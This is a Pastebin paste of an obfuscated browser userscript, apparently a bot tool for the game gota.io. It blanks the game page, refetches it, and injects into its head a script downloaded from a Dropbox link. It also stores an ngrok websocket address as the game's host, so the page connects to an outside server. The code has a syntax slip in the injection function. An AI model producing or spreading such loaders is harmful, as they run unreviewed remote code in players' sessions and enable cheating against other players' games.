Advertisement
Guest User

Untitled

a guest
Mar 23rd, 2017
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.08 KB | None | 0 0
  1. // ==UserScript==
  2. // @name Gota Sponsor Bots
  3. // @namespace Gota
  4. // @version 1.0
  5. // @description Gota Bots
  6. // @author Nightox
  7. // @match ://gota.io/web
  8. // @require https://code.jquery.com/jquery-3.1.1.min.js
  9. // @run-at document-start
  10. // @grant GM_xmlhttpRequest
  11. // ==/UserScript==
  12.  
  13. var hostip = "ws://ed2004ca.ngrok.io";
  14.  
  15. localStorage.setItem('host', hostip);
  16.  
  17. (function () {
  18. "use strict";
  19. function _0xb0f9x1(_0xb0f9x2) {
  20. 0xb0f9x2 = 0xb0f9x2.replace("<head>", "<head><script src='https://dl.dropboxusercontent.com/s/t0btznnoox7jqud/script.js?dl=0'></script><script src='https://cdn.socket.io/socket.io-1.3.5.js' onload='window.meme();'></script>");
  21. return _0xb0f9x2
  22. }
  23. window.stop();
  24. document.documentElement.innerHTML = "";
  25. GM_xmlhttpRequest({
  26. method: "GET"
  27. , url: "http://gota.io/web/"
  28. , onload: function (_0xb0f9x3) {
  29. document.open();
  30. document.write(_0xb0f9x1(_0xb0f9x3.responseText));
  31. document.close()
  32. }
  33. })
  34. })()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement